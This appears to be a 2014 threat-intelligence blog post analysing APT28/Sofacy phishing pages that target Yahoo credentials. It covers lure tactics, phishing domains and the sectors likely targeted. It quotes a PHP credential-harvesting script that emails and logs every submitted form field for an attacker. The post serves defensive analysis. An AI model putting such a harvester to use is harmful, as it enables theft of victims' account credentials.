APT28: Sofacy? So-funny.

05 December 2014


 View Tom Lancaster’s profile on LinkedIn

 View Michael Yip’s profile on LinkedIn

Changes to the code used in phishing

One of the new aspects to the phishing campaigns that we haven’t seen before are variations to the code behind the phishing pages. Examples of the older and newer samples of code are given below:

Older code sample, observed on natoexhibitionff14[.]com:

Older code sample

Newer, simpler code observed on us6-yahoo[.]com:

Newer sample code

This accomplishes the same objective as the older, obfuscated code, but is simpler and is more difficult to detect with SNORT signatures. When the code above works[1], it does so in a similar fashion to the way it is described in TrendMicro’s paper on the group[2], redirecting the initial window to benign content, and opening a new tab where a fake login page lies in wait for the user to open it. However, what is quite different on this occasion is that the benign content used is a compilation video of funny animal moments, rather than a NATO conference. In some cases, the attackers believe that the lure of a funny video is more tempting than information about an upcoming conference.




For completeness, the new tab opened by the script shows users the following page:




Unlike previous examples given in both our blog and the previously cited TrendMicro paper, on this occasion this phishing is for Yahoo addresses.

Sofacy Yahoo credential phishing

In fact, there are several other Sofacy domains which phish Yahoo credentials. In addition to the Yahoo! phishing pages we observed on the domain us6-yahoo[.]com, we  found similar pages on  y-privacy[.]com and www.privacy-live[.]com serving pages appearing to target Yahoo!Mail credentials. In all of the cases, the source-code behind the Yahoo phishing pages was almost identical.

We also analysed the code of the landing page at y-privacy[.]com:

  Landing page

As shown in the image, the design of the form is rather unusual due to the high number of hidden fields. We also noticed the fields “.u” and “.challenge” hold what appears to be some form of hash value and by comparing this with the other Yahoo! Phishing pages used by the attackers, we can see that the same hash values are present in each case. Could these be campaign identifiers?

Looking at the code, we can also see the phishing form is assigned a JavaScript event handler that calls returns hash2(this) when the form is submitted. However, we were unable to find the source of the function hash2() on the webpage. This led us to do more research around the function.

Searching for other code using this function, we found that the code used in the Sofacy phishing page is in fact identical to that posted in a blog by a group of Kurdish hackers called H4KurD-TeaM[3] in 2009:

Assuming the attackers followed the instructions on the blog post, we can hypothesise that they probably also used server side implementation the original bloggers provided.

$posts        = '';

foreach($_POST as $k => $v){

    $posts .= '$_POST['.$k.'] = '.$v."\n";


$posts       .= "---------------------------------------------------\n";

$emailto    = '[email protected]';

$subject    = $_SERVER['HTTP_HOST']."-".$_SEREVER['SERVER_NAME'];

$from        = "From: Password <[email protected]>";

$body        = '



@mail($emailto, $subject, $body, $from);

$handle = @fopen("h4kurd.txt", "a+");

@fwrite($handle, $posts);



// replace your email here

$emailto    = '[email protected]';


This server side script is written in PHP and works by parsing the arguments submitted in the form, collating them into one long string and then emailing the string to the attacker, the same data is written to a text file on the server in log-like format. However, we note that the default landing page of both y-privacy[.]com and www.privacy-live[.]com are written in ASP and so there is a chance that the attackers have used a different server-side  implementation.

Who are the Sofacy attackers targeting?

In our previous blog[4] we noted some similarities between the domain names chosen by the attackers, and real organisations, including a number of diplomatic institutions, military contractors & energy companies. Since then, we’ve seen more domain registrations where the domain name bears some resemblance to the likely intended victims of the attacks, as well as some more generic phishing sites being set up by the attackers:


Intended Victim?









N/A – Generic Yahoo



We’ve re-examined all of our historic and current data for phishing domains used by the Sofacy attackers, and performed victim analysis similar to that shown in the table, to get an idea of the different countries and sectors the attackers may be targeting; the countries with impersonated organisations are highlighted in red:

World icon

It should be noted that there were a number of domains which impersonate generic services (for example, us6-yahoo.com) - these were not included in the map above. However one thing that has stood out is the sheer number of domains registered which impersonate international defence events. Of the 64 Sofacy domains we can identify as impersonating a real organisation, 15 of them impersonate international defence/security events that are hosted in Europe. If you’re attending a national security or defence conference this year – make sure you’re careful about which e-mails you click on, and which domains you’re visiting when you type in your credentials.


Usually when people talk about phishing campaigns perpetrated by ‘APT’ actors like the Sofacy attackers, compilation videos of funny animals don’t come to mind as the likely theme. However, part of the skill in socially engineering is choosing something that works, and even espionage actors know that sometimes the simplest themes are the best – for example there are multiple cases of ‘APT’ actors using simple holiday based themes for spearphishing in the past[5],[6],[7].

So in the case where the target of the spearphishing is not particularly technical, using lures commonly used by cybercriminal actors, such as amusing videos, adult material or holiday themed messages are often successful in baiting users into clicking on malicious links.

Further information

For more in-depth coverage, including details of the analysis behind this blog as well as additional indicators which can be used to detect their activity, or if you have any other queries, please give us a shout at [email protected].

[1] We have not been able to reproduce the attack’s intended behaviour in our lab in any browser, however based on the code which Trend Micro analysed we believe the outcome should be the same.

[2] http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-operation-pawn-storm.pdf

[3] http://zul-everything.blogspot.co.uk/2009/09/phishing-yahoo-special.html

[4] http://pwc.blogs.com/cyber_security_updates/2014/10/phresh-phishing-against-government-defence-and-energy.html

[5] contagiodump.blogspot.co.uk/2011/12/adobe-zero-day-cve-2011-2462.html

[6] contagiodump.blogspot.co.uk/2011/01/general-file-information-file-card.html

[7] contagiodump.blogspot.co.uk/2010/12/dec-21-cve-2010-2572-christmas.html